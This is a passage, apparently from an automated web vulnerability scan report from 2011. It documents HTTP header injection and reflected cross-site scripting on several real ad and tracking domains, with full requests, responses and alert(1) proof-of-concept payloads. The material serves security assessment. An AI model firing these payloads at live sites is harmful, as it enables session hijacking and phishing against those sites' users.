GET /5/c=25/b=1225394?f335d%0d%0a6c92f1d82cf=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project-syndicate.org/series_metacategory/1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:34 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdy6jIGBUS%2Fl7URjBlkGBgElBjDoBZM8l8GU4FcwxcsMpoTaIHI3IYLSEB4fmOJ6DKZEFcAU%2F18wJcwBpth4wRSHEZjiE4WoFAZTAschRj%2BD6HODWBsBESyGUCUQi943MDQArf0HMVofzBOIgAiaQhzhDyQArR4Vqg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/ Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1mX%2Fv2w5zMDAqJfydqIxSIyBzVlWiYmBQZKB4T8jA8OX%2F3%2BAFJARI7RpEyNMGMhQENq0A5lvo8z1F5nPpBTvgqyfUWirJUj%2B%2F18on4FDpk4d3SKu1kkYQvUN6ELcCbvQhTgfL8dUtRNdiK%2FiLbqQrNlFdCEAS1pZFg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/ Location: http://f335d 6c92f1d82cf=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0
2.8. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://tags.crwdcntrl.net
Path:
/5/c=25/b=1225400
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2f2f5%0d%0a3a2cc9ab32b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /5/c=25/b=1225400?2f2f5%0d%0a3a2cc9ab32b=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project-syndicate.org/series_metacategory/1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:08 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdzaw8DAqJfyVjeXQZaBQUCJAQx6wSTPZTAl%2BBVM8TKDKaE2iNxNiKA0hMcHprgegylRBTDF%2FxdMCXOAKTZeMMVhBKb4RCEqhcGUwHGI0c8g%2Btwg1kZABIshVAnEovcNDA1AM%2FXBFO8%2FiCNMIaZEgAW5%2FIFsAG6pFWY%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:08 GMT; Path=/ Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1p7%2FX7bcZWBg1Et5q5sLEmNgc5ZVYmJgkGRg%2BM%2FIwPDl%2Fx8gBWQoCW3awQgTBjIUhDZtAvH%2F%2F4XwGZXiXZDVMypz%2FUVWzyi01RJFPQOHTJ06ukVcrZMwhOob0IW4E3ahC3E%2BXo6paie6EF%2FFW3QhWbOL6EIAg7Jacg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:08 GMT; Path=/ Location: http://2f2f5 3a2cc9ab32b=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0
2.9. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://tags.crwdcntrl.net
Path:
/5/c=25/b=1226041
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2bdae%0d%0a32111a498f8 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /5/c=25/b=1226041?2bdae%0d%0a32111a498f8=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project-syndicate.org/series_metacategory/1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:36 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdy6goGBUS%2Fl7YyHDLIMDAJKDGDQCyZ5LoMpwa9gipcZTAm1QeRuQgSlITw%2BMMX1GEyJKoAp%2Fr9gSpgDTLHxgikOIzDFJwpRKQymBI5DjH4G0ecGsTYCIlgMoUogFr1vYGgAmqkPpnj%2FQRxhCjElAizI5Q9kAwA5%2FRZh; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/ Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1hX%2Fv2w5yMDAqJfydsZDkBgDm7OsEhMDgyQDw39GBoYv%2F%2F8AKSCjT2irJSNMGMiQEdq0A5lvI7RpEzLfQpnrLzKfWSneBdk8RgYOmTp1dIu4WidhCNU3oAtxJ%2BxCF%2BJ8vBxT1U50Ib6Kt%2BhCsmYX0YUA271YNQ%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/ Location: http://2bdae 32111a498f8=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0
3. Cross-site scripting (reflected)
There are 91 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 5f6c7<script>alert(1)</script>9faa69a0bfd was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1430720&pid=11287695f6c7<script>alert(1)</script>9faa69a0bfd&ps=-1&zw=475&zh=200&url=http%3A//forums.winamp.com/&v=5&dct=Winamp%20Forums&metakw=media%20player,mp3%20player,music%20player,ipod%20sync,multimedia%20player,player,winamp HTTP/1.1 Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:43:39 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User-Agent Content-Length: 2510
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "11287695f6c7<script>alert(1)</script>9faa69a0bfd"
The value of the placementId request parameter is copied into an HTML comment. The payload ce49b--><script>alert(1)</script>7267909dc51 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1430720ce49b--><script>alert(1)</script>7267909dc51&pid=1128769&ps=-1&zw=475&zh=200&url=http%3A//forums.winamp.com/&v=5&dct=Winamp%20Forums&metakw=media%20player,mp3%20player,music%20player,ipod%20sync,multimedia%20player,player,winamp HTTP/1.1 Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:43:16 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3257
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "1430720ce49b--><script>alert(1)</script>7267909dc51" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload 78c7f--><script>alert(1)</script>c5a78cccd8b was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1430720&pid=1128769&ps=-178c7f--><script>alert(1)</script>c5a78cccd8b&zw=475&zh=200&url=http%3A//forums.winamp.com/&v=5&dct=Winamp%20Forums&metakw=media%20player,mp3%20player,music%20player,ipod%20sync,multimedia%20player,player,winamp HTTP/1.1 Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:44:02 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3696
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-178c7f--><script>alert(1)</script>c5a78cccd8b" -->
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e85e0<script>alert(1)</script>0928072ac46 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tracking.aspx/gettoken/?callback=this.altTracker.onReceiveTokene85e0<script>alert(1)</script>0928072ac46&noCacheIE=1298762276937 HTTP/1.1 Host: alterianwaserver.alterianconnect.net Proxy-Connection: keep-alive Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private, max-age=0 Content-Type: application/json; charset=utf-8 Expires: Sat, 26 Feb 2011 23:20:10 GMT Last-Modified: Sat, 26 Feb 2011 23:20:10 GMT Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:20:09 GMT Content-Length: 137
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2b978<script>alert(1)</script>00c0c3b016f was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tracking.aspx/submitevents/?Token=37fb592e-52fa-4ee1-8178-cbb08165d406&Session=25aa86a5-ea98-45f3-a174-e3469a6e00b9&callback=this.altTracker.onEventSubmitAck2b978<script>alert(1)</script>00c0c3b016f&Events=%5B%7B%22EventID%22%3A%221%22%2C%22EventTime%22%3A%22%2FDate(1298762276936)%2F%22%2C%22Asset%22%3A%22http%3A%2F%2Fwebcontent.alterian.com%2F%7Chttp%3A%2F%2Fwebcontent.alterian.com%2F%22%2C%22Value%22%3A%22%22%7D%5D&noCacheIE=1298762279411 HTTP/1.1 Host: alterianwaserver.alterianconnect.net Proxy-Connection: keep-alive Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/json; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:20:31 GMT Content-Length: 90
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f4af1<script>alert(1)</script>977a3000986 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tracking.aspx/submitsession/?Token=37fb592e-52fa-4ee1-8178-cbb08165d406&callback=this.altTracker.onSessionSubmitAckf4af1<script>alert(1)</script>977a3000986&timeoffset=360&scrres=1920%20x%201200&username=&trackedsite=alterian-content-management.com&ref=unknown&noCacheIE=1298762278213 HTTP/1.1 Host: alterianwaserver.alterianconnect.net Proxy-Connection: keep-alive Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private, max-age=0 Content-Type: application/json; charset=utf-8 Expires: Sat, 26 Feb 2011 23:20:30 GMT Last-Modified: Sat, 26 Feb 2011 23:20:30 GMT Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:20:29 GMT Content-Length: 212
The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55c54'-alert(1)-'aa8bf6ae2f0 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad/js/3992-121072-16279-0?mpt=77383421555c54'-alert(1)-'aa8bf6ae2f0&mpvc=http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link= HTTP/1.1 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55d8a'%3balert(1)//2ee66e943dc was submitted in the mpvc parameter. This input was echoed as 55d8a';alert(1)//2ee66e943dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad/js/3992-121072-16279-0?mpt=773834215&mpvc=http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=55d8a'%3balert(1)//2ee66e943dc HTTP/1.1 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880
3.9. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://altfarm.mediaplex.com
Path:
/ad/js/3992-121072-16279-0
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8535c'%3balert(1)//a8fa310d924 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8535c';alert(1)//a8fa310d924 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad/js/3992-121072-16279-0?mpt=773834215&mpvc=http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=&8535c'%3balert(1)//a8fa310d924=1 HTTP/1.1 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload a5385<script>alert(1)</script>1a4bb3f8d71 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /TCTUL001/twidget/1.jsonp?jsonp=jsonp1298773825717a5385<script>alert(1)</script>1a4bb3f8d71&numAuthors=7&numPosts=0&bf=tech&uip=&ua=&ref=http%3A%2F%2Ftechcrunch.com%2F2011%2F02%2F16%2Fforbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links%2F&qh=TechCrunch&format=300x600 HTTP/1.1 Host: api.postup.com Proxy-Connection: keep-alive Referer: http://www.tweetup.com/twidget/twidget.2.300x600.html?partner=TCTUL001&keyword=TechCrunch&backfill=tech&refurl=http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 27 Feb 2011 02:32:03 GMT Content-Type: text/javascript; charset=UTF-8 Connection: keep-alive Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: bc=9CE434E0-6353-4F68-9196-9FD9DBD5DD9E;Path=/;Expires=Wed, 24-Feb-21 02:32:03 GMT Set-Cookie: sc=6148C463-8CE9-4536-981B-E1A093F9C2BB;Path=/ Set-Cookie: bp=NR6mPz0SXEsXB_t8NNHvEsKZO0M;Path=/ CP: NON DSP CURa ADMa DEVa TAIa IVAa IVDa OUR BUS IND UNI COM NAV INT CNT Content-Length: 19542
jsonp1298773825717a5385<script>alert(1)</script>1a4bb3f8d71({"users":[{"created_at":"Wed May 19 20:08:01 PDT 2010","description":"News and opinions on technology, internet \u0026 media. Focused on investors, companies and products impacting social and commerci ...[SNIP]...
The value of the imageurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 365ee'%3balert(1)//b377350152c was submitted in the imageurl parameter. This input was echoed as 365ee';alert(1)//b377350152c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /TechCrunchApp-Techcrunch_APP?appid=0b9c9103-d379-409d-9edb-54745461fe64&script=togo&type=1&imageurl=http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.gif365ee'%3balert(1)//b377350152c&supportedonly=1 HTTP/1.1 Host: apps.conduit-banners.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 27 Feb 2011 03:31:08 GMT Content-Type: text/javascript; charset=utf-8 Server: Microsoft-IIS/6.0 P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Vary: Accept-Encoding Content-Length: 4674
function imgToGoOnLoad__806157278(imgObj) {var elm = imgObj,func__806157278 = function(){ SharedItems.Togo.Manager.createItem('0b9c9103-d379-409d-9edb-54745461fe64','','2523688','TechCrunch-App' ...[SNIP]... <img style="cursor: pointer; visibility: visible;" src="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.gif365ee';alert(1)//b377350152c" title="Grab an app for your browser" alt="Techcrunch News" border="0" onload="imgToGoOnLoad__806157278(this);" > ...[SNIP]...
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 76688<script>alert(1)</script>2d0cdbe6589 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
